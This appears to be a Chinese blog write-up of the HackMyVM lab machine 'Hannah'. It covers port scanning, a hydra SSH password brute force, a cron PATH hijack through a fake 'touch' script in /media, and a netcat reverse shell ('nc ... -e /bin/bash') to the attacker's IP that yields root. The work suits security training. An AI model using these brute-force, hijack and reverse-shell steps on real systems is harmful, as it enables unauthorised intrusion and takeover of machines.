Loading

[HMV] Hannah

0x00 配置

攻击机 IP: 172.16.1.25

靶机 IP: 172.16.1.235

0x01 攻击

使用 Nmap 扫描目标靶机开放的端口

┌──(root㉿Kali-VM)-[~]
└─# nmap -sC -sV -p- 172.16.1.235
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-20 09:47 CST
Nmap scan report for 172.16.1.235
Host is up (0.00052s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
|_auth-owners: root
| ssh-hostkey: 
|   3072 5f1c78369905320982d3d5054c1475d1 (RSA)
|   256 0669ef979b34d7f3c79660d1a1ffd82c (ECDSA)
|_  256 853dda74b2684ea6f7e5f58540902e9a (ED25519)
80/tcp  open  http    nginx 1.18.0
| http-robots.txt: 1 disallowed entry 
|_/enlightenment
|_auth-owners: moksha
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0
113/tcp open  ident?
|_auth-owners: root
MAC Address: 08:00:27:57:4A:D1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.33 seconds

发现了三个端口,22 (SSH)、80 (HTTP)、113,直接看 Web

Under construction

网站提示正在建设,扫描一下后台

┌──(root㉿Kali-VM)-[~]
└─# dirb http://172.16.1.235/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Mar 20 09:50:06 2023
URL_BASE: http://172.16.1.235/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://172.16.1.235/ ----
+ http://172.16.1.235/index.html (CODE:200|SIZE:19)                                                                                                                        
+ http://172.16.1.235/robots.txt (CODE:200|SIZE:25)                                                                                                                       
-----------------
END_TIME: Mon Mar 20 09:50:08 2023
DOWNLOADED: 4612 - FOUND: 2

发现了 robots.txt,打开看看

Disallow: /enlightenment

发现一个路径,不过打开是 404,Web 的线索断了。回去看 Nmap 的扫描结果,发现了一个 auth-owners 属性,百度一下得知这个值的意思是当前监听 Web 的用户名,那么尝试用 moksha 作为用户名,直接爆破 SSH

┌──(root㉿Kali-VM)-[~]
└─# hydra -l moksha -P /usr/share/wordlists/rockyou.txt ssh://172.16.1.235:22 -t 6 -V -f -I
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

...

[22][ssh] host: 172.16.1.235   login: moksha   password: hannah
[STATUS] attack finished for 172.16.1.235 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

找到了用户 moksha 的密码 hannah,直接登录 SSH

[C:\~]$ ssh moksha@172.16.1.235


Connecting to 172.16.1.235:22...
Connection established.
To escape to local shell, press Ctrl+Alt+].

Linux hannah 5.10.0-20-amd64 #1 SMP Debian 5.10.158-2 (2022-12-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jan  4 10:45:54 2023 from 192.168.1.51
moksha@hannah:~$ id
uid=1000(moksha) gid=1000(moksha) grupos=1000(moksha),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

moksha@hannah:~$ whoami
moksha

登录成功后,查看所有能运行终端的用户

moksha@hannah:~$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
moksha:x:1000:1000:moksha,,,:/home/moksha:/bin/bash

只发现了 root 和 moksha 用户,看来需要直接从 moksha 用户提权到 root。查看具有 SUID 权限的命令

moksha@hannah:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/mount

没发现可以用来提权的命令,使用 Pspy 看看定时任务

moksha@hannah:/tmp$ ./pspy64 
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done

...

2023/03/20 03:35:24 CMD: UID=0     PID=1      | /sbin/init 
2023/03/20 03:36:01 CMD: UID=0     PID=22524  | /usr/sbin/CRON -f 
2023/03/20 03:36:01 CMD: UID=0     PID=22523  | /usr/sbin/cron -f 
2023/03/20 03:36:01 CMD: UID=0     PID=22525  | /usr/sbin/CRON -f 
2023/03/20 03:36:01 CMD: UID=0     PID=22526  | /usr/sbin/CRON -f 
2023/03/20 03:36:01 CMD: UID=0     PID=22527  | /bin/sh -c touch /tmp/enlIghtenment

发现一个奇怪的 touch 命令,查看一下 cron 的配置文件

moksha@hannah:/media$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/media:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
* * * * * root touch /tmp/enlIghtenment
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

发现 /media 目录也在 PATH 中,而 /media 是我们可读写的,尝试在 /media 中劫持 touch 命令

在 /media 中创建 touch 文件

#/bin/bash

nc 172.16.1.25 5004 -e /bin/bash

赋予执行权限

chmod a+x ./touch

稍等一会,就接收到了反弹过来的 Shell

┌──(root㉿Kali-VM)-[~]
└─# nc -lvnp 5004
listening on [any] 5004 ...
connect to [172.16.1.25] from (UNKNOWN) [172.16.1.235] 60254
id
uid=0(root) gid=0(root) grupos=0(root)

whoami
root

最后获得 root.txt

ls -al ~
total 28
drwx------  3 root root 4096 ene  4 10:48 .
drwxr-xr-x 18 root root 4096 ene  4 10:47 ..
lrwxrwxrwx  1 root root    9 ene  4 10:45 .bash_history -> /dev/null
-rw-r--r--  1 root root  571 abr 10  2021 .bashrc
drwxr-xr-x  3 root root 4096 ene  4 10:46 .local
-rw-r--r--  1 root root  161 jul  9  2019 .profile
-rw-------  1 root root   15 ene  4 10:48 root.txt
-rw-r--r--  1 root root   66 ene  4 10:47 .selected_editor

cat ~/root.txt
HMVHAPPYNY2023

0x02 总结

用到了定时任务和环境变量劫持

posted @ 2023-03-20 11:00  20206675  阅读(35)  评论(0编辑  收藏  举报